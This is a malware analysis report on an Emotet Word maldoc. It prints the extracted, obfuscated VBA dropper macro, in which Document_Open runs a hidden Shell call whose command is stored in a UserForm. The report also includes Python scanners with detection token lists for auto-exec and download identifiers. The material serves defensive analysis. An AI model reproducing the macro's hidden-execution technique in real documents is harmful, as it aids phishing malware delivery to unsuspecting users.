Emotet — Office (OOXML) malware analysis

Static analysis result for SHA-256 b99528c00d6ac14b…

MALICIOUS

Office (OOXML)

Size: 94.1 KB
Created: 2019-02-27 09:22:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2019-03-10
MD5: db05e46e401c597860496fdc727159c6
SHA-1: 47d62c7e0c84e05ce70827781052ab77f765ea18
SHA-256: b99528c00d6ac14bf99ade801638f8deb78ba5c610ead5ca6ac68a69f95547bc
Risk Score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
T1566.001 Phishing: Spearphishing Attachment

The sample is an OOXML Word document carrying a VBA project (word/vbaProject.bin) whose ThisDocument module defines a Document_Open auto-execution routine. Document_Open calls z() in module ET3dl, which ends in VBA.Shell(fUvmst, 0); window style 0 (vbHide) starts the child process without a visible window. The command line itself is not in the macro source: fUvmst() in module M18aXQk instantiates the UserForm fm and returns the Text property of its control mynewtxt, so the string is stored in the form's data inside vbaProject.bin and has to be recovered from there (olevba reports such values as form strings). The remaining statements are padding: typed variables assigned random constants that are never read, unused string arithmetic, and a dead branch (If 18045 / 45 = 1188 - 1172 is never true, since 401 is not 16). ClamAV matches the document against an Emotet downloader signature; Emotet maldocs of this type run a command that fetches and executes the next stage, but the actual command is not visible in the extracted source and should be pulled from the form data before drawing conclusions about the download URL.

Heuristics (6)

  • ClamAV: Doc.Downloader.Emotet-6869634-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6869634-0
  • VBA project inside OOXML (medium, OOXML_VBA, 3 related findings)
    Document contains a VBA project (word/vbaProject.bin); VBA macros are present
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    VBA.Shell(fUvmst, 0) in module ET3dl spawns a process with a hidden window (window style 0); the command string is supplied by the function fUvmst(), which reads it from a UserForm control rather than from a literal in the source
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    ThisDocument.Document_Open runs as soon as the document is opened with macros enabled; it calls z(), the procedure that issues the Shell() call
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    The compiled VBA/cache streams contain an auto-execution identifier together with shell/download/object-execution identifiers. This check works on the compiled streams, so it still fires for p-code-only documents and for documents whose source extraction fails and leaves no readable source.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL labels record which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All 16 URLs below were found in document text (OOXML body / shared strings). Every one of them is an XML namespace URI from the package's own parts, not an address the document contacts; the command that Shell() runs is not among them because it is stored in the UserForm, not in the document body.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
    • http://schemas.microsoft.com/office/drawing/2014/chartex
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/officeDocument/2006/math
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main
    • http://schemas.microsoft.com/office/word/2010/wordml
    • http://schemas.microsoft.com/office/word/2012/wordml
    • http://schemas.microsoft.com/office/word/2015/wordml/symex
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk
    • http://schemas.microsoft.com/office/word/2006/wordml
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape
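The two structural checks above (OOXML_VBA and OLE_VBA_PCODE_AUTOEXEC_EXEC) can be reproduced without any VBA source at all: open the package as a zip, pull out the VBA project part, and look for auto-exec and execution identifiers in its raw bytes in both 8-bit and UTF-16LE form. The Python below is an added illustration written for this page, not the scanner that produced the report; the token lists, the in-memory test package and the two byte blobs are constructed for the example, and the blobs only imitate the identifier layout rather than being real OLE containers.

```python
import io
import re
import zipfile

# Identifiers that run a macro without any click once macros are enabled.
AUTOEXEC_TOKENS = [b"Document_Open", b"AutoOpen", b"Auto_Open",
                   b"Workbook_Open", b"AutoExec"]
# Identifiers that spawn a process, fetch a payload or instantiate a COM object.
EXEC_TOKENS = [b"Shell", b"WScript.Shell", b"ShellExecute", b"CreateObject",
               b"URLDownloadToFile", b"XMLHTTP", b"ADODB.Stream"]


def _patterns(token: bytes):
    """Compile an 8-bit and a UTF-16LE pattern for one identifier, each
    bounded so that 'Shell' does not fire inside 'PowerShell'."""
    narrow = rb"(?<![A-Za-z0-9_])" + re.escape(token) + rb"(?![A-Za-z0-9_])"
    wide_token = re.escape(token.decode("ascii").encode("utf-16-le"))
    wide = rb"(?<![A-Za-z0-9_]\x00)" + wide_token + rb"(?![A-Za-z0-9_]\x00)"
    return re.compile(narrow, re.IGNORECASE), re.compile(wide, re.IGNORECASE)


def scan_compiled_vba(data: bytes) -> dict:
    """Scan raw VBA project bytes for auto-exec and execution identifiers.
    Identifiers in the compiled/cache streams may be stored as 8-bit or as
    UTF-16LE strings, so both encodings are checked. The verdict needs one
    token from each class, mirroring the p-code heuristic on this page."""
    def hits(tokens):
        found = []
        for tok in tokens:
            if any(p.search(data) for p in _patterns(tok)):
                found.append(tok.decode("ascii"))
        return found
    autoexec, execs = hits(AUTOEXEC_TOKENS), hits(EXEC_TOKENS)
    return {"autoexec": autoexec, "exec": execs, "hit": bool(autoexec and execs)}


def scan_ooxml(package: bytes) -> dict:
    """Open an OOXML package in memory, find every VBA project part
    (word/vbaProject.bin, xl/vbaProject.bin, ...) and scan each of them."""
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        parts = [n for n in zf.namelist() if n.lower().endswith("vbaproject.bin")]
        return {"vba_parts": parts,
                "findings": {p: scan_compiled_vba(zf.read(p)) for p in parts}}


def build_sample_docx(vba_blob: bytes) -> bytes:
    """Constructed test input: a minimal OOXML zip carrying a VBA part. The
    part is a byte blob with the identifier layout of interest, not a real
    OLE container (this scanner does not parse the OLE structure)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", vba_blob)
    return buf.getvalue()


# Constructed stream fragments: one with an 8-bit Document_Open next to a
# UTF-16LE "Shell", one with an auto-exec entry point but no execution token.
MALICIOUS_BLOB = (b"\x00" * 16 + b"Document_Open" + b"\x00" * 4
                  + "Shell".encode("utf-16-le") + b"\x00" * 4)
BENIGN_BLOB = (b"\x00" * 16 + b"Document_Open" + b"\x00" * 4
               + b"ActiveDocument" + b"\x00" * 4)

if __name__ == "__main__":
    print(scan_ooxml(build_sample_docx(MALICIOUS_BLOB)))
    print(scan_compiled_vba(BENIGN_BLOB))
```

Scanning the whole vbaProject.bin as one byte string is a triage shortcut: an identifier that straddles a sector boundary of the OLE container is split and missed. For production use, open the part with olefile, walk the `_VBA_PROJECT`, `__SRP_*` and module streams individually, and run the same token search on each stream's contents.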

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 2028 bytes
SHA-256: f575305918dae4af09886c96638f780ba1326f452b3af7db3097ac936bd8bd45
Extracted VBA source (preview, first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Sub Document_Open()


Call z
End Sub

Attribute VB_Name = "ET3dl"
Sub yKhfqA()
End Sub
Public Sub z()
Dim iTF0t6MHV As Single
iTF0t6MHV = 51443.538064102
Dim TOn9lamf As Double
TOn9lamf = Sgn(24237.439338447)
Dim gWneoH
gWneoH = LCase(be7fZ)
Dim xuixBz As Integer
xuixBz = Sgn(10512)
Dim IxDeQck As Single
IxDeQck = 41379.156175635
Dim FEhAj3k As Byte
FEhAj3k = 156
Dim tpQR13NzE As Long
tpQR13NzE = -1581512616
Dim lvwYGO8j As Byte
lvwYGO8j = 126
Dim pUFqucYoV As Byte
pUFqucYoV = 29
Dim acL0N8V As Double
acL0N8V = Val(60250.226249357)
Dim QjPW5E As Byte
QjPW5E = 46
Dim vZmAM As Integer
vZmAM = Sgn(27412)
cQIhewDGN = VBA.Shell(fUvmst, 0)
End Sub

Attribute VB_Name = "UyPhS9"
Sub mxHcL1ngG()
End Sub
Sub KflrRbWZc()
End Sub

Attribute VB_Name = "M18aXQk"
Sub IfzUtDq()
End Sub
Public Function fUvmst()
Dim jewN5xGF4 As Double
jewN5xGF4 = Sgn(3.1323832915231)
Dim FoyZEO6 As Integer
FoyZEO6 = -32124
Dim yr4a0K As Object
Set yr4a0K = New fm
Dim iuALWPnso As Double
iuALWPnso = 58152.134397185
ekbswJ8C = "mxKHzoRi1SXQtVNJHsZNr2"
fUPfnbQpu = 32103 / 10701
eyOGI = -3008 + 3016
xVaEh = Mid(ekbswJ8C, fUPfnbQpu, eyOGI)
Dim rWpiO As Double
rWpiO = 40666.530738674
Dim lf6GL As Long
lf6GL = Sgn(0)
Dim qCwh456 As Boolean
qCwh456 = True
If 18045 / 45 = 1188 - 1172 Then
zJyr1Cwup = "AOBkG"
End If
fUvmst = yr4a0K.mynewtxt.Text
End Function

Attribute VB_Name = "fm"
Attribute VB_Base = "0{AA7073C8-E9EB-488D-92E5-788807E9BE1F}{2A58C9F4-1DE7-48AF-9FAB-149F610DA65B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
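The chain in the source above (Document_Open calls z, z calls VBA.Shell with a value returned by fUvmst, fUvmst reads a UserForm control) is short enough to recover mechanically. The Python below is an added example for this page, not part of the report or of oletools: it parses decoded VBA text, lists auto-exec entry points and Shell() calls, traces the Shell argument back to the function that produces it, and flags when that function returns a form control's Text, which is the signal that the command must be recovered from the form data in vbaProject.bin. SAMPLE_VBA is a trimmed copy of the modules shown above with the padding statements removed; the auto-exec name list and the one-hop call check are the example's own choices.

```python
import re

# Trimmed copy of the macro source extracted from this sample; the junk
# numeric assignments that pad the real modules are left out.
SAMPLE_VBA = '''\
Attribute VB_Name = "ThisDocument"
Sub Document_Open()
Call z
End Sub

Attribute VB_Name = "ET3dl"
Public Sub z()
Dim FEhAj3k As Byte
FEhAj3k = 156
cQIhewDGN = VBA.Shell(fUvmst, 0)
End Sub

Attribute VB_Name = "M18aXQk"
Public Function fUvmst()
Dim yr4a0K As Object
Set yr4a0K = New fm
fUvmst = yr4a0K.mynewtxt.Text
End Function

Attribute VB_Name = "fm"
Attribute VB_Base = "0{AA7073C8-E9EB-488D-92E5-788807E9BE1F}{2A58C9F4-1DE7-48AF-9FAB-149F610DA65B}"
'''

# Procedure names Office runs without a click once macros are enabled.
AUTOEXEC = {"document_open", "autoopen", "auto_open", "workbook_open",
            "autoexec", "autoclose", "document_close"}

PROC_RE = re.compile(
    r"^[ \t]*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)\s*\(.*?"
    r"^[ \t]*End\s+(?:Sub|Function)\b",
    re.IGNORECASE | re.MULTILINE | re.DOTALL)
# Shell(<first arg>[, <window style>]); VBA.Shell and bare Shell both count.
SHELL_RE = re.compile(r"\b(?:VBA\.)?Shell\s*\(\s*(\w+)\s*(?:,\s*(\d+))?",
                      re.IGNORECASE)


def procedures(src):
    """Map each Sub/Function name to its full text."""
    return {m.group(1): m.group(0) for m in PROC_RE.finditer(src)}


def resolve_shell_argument(procs, arg):
    """Trace the identifier passed to Shell(). When it names a Function that
    returns a UserForm control's .Text, the command line lives in the form's
    data inside vbaProject.bin rather than in the macro source."""
    if arg not in procs:
        return {"kind": "variable", "name": arg}
    body = procs[arg]
    m = re.search(rf"^[ \t]*{re.escape(arg)}\s*=\s*(\w+)\.(\w+)\.Text\b",
                  body, re.IGNORECASE | re.MULTILINE)
    if not m:
        return {"kind": "function", "name": arg}
    obj, control = m.group(1), m.group(2)
    form = re.search(rf"\bSet\s+{re.escape(obj)}\s*=\s*New\s+(\w+)", body,
                     re.IGNORECASE)
    return {"kind": "userform_control", "function": arg,
            "form": form.group(1) if form else None, "control": control}


def calls(body, proc):
    """True if a statement in body invokes proc directly (Call z / z)."""
    return re.search(rf"^[ \t]*(?:Call\s+)?{re.escape(proc)}\b", body,
                     re.IGNORECASE | re.MULTILINE) is not None


def triage_vba_source(src):
    """Static triage of decoded VBA: auto-exec entry points, Shell() calls,
    where each Shell argument comes from, and whether an auto-exec routine
    reaches a Shell() call in one hop."""
    procs = procedures(src)
    modules = re.findall(r'^Attribute VB_Name = "(\w+)"', src, re.MULTILINE)
    autoexec = [n for n in procs if n.lower() in AUTOEXEC]
    shell_calls = []
    for name, body in procs.items():
        for m in SHELL_RE.finditer(body):
            shell_calls.append({
                "proc": name,
                "arg": m.group(1),
                # window style 0 (vbHide) runs the child with no visible window
                "window_style": int(m.group(2)) if m.group(2) else None,
                "argument_source": resolve_shell_argument(procs, m.group(1)),
            })
    reaches = any(a == c["proc"] or calls(procs[a], c["proc"])
                  for a in autoexec for c in shell_calls)
    return {"modules": modules, "autoexec": autoexec,
            "shell_calls": shell_calls, "autoexec_reaches_shell": reaches}


if __name__ == "__main__":
    import json
    print(json.dumps(triage_vba_source(SAMPLE_VBA), indent=2))
```

The call check is deliberately one hop deep, which is all this sample needs; a macro that routes through several helper procedures would need the same check applied transitively. When the argument source comes back as a userform_control, the next step is to dump the form strings from vbaProject.bin (olevba prints them, or read the form's storage with olefile) to obtain the actual command.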
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 23552 bytes
SHA-256: 32450fa46d5667529adf066c8be6623b6a6369ac42c9fc966778f616e9562b6e